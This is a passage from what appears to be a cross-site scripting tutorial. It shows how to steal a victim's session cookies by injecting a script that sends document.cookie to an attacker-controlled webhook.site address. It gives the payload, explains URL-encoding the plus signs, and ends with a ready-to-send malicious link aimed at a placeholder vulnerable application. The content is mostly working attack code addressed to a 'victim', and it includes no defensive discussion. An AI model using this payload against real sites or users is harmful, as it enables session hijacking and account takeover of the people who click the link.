We can leverage the following website so that we do not need our own webserver. https://webhook.site/
With a webhook in hand, we’re ready to craft our payload. Our payload should look like this. We’ll want to make sure we replace the URL with our generated webhook address.
<script> document.write('<img src="[URL]?c='+document.cookie+'" />'); </script>
Once the browser renders the JavaScript the <img tag should look like the following and send the cookies to our website:
<img src="[URL]?c=[COOKIE]"/>
Before sending the link to the victim, make sure you encode the + symbols by replacing them with %2b
.
An example payload will look like the following:
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>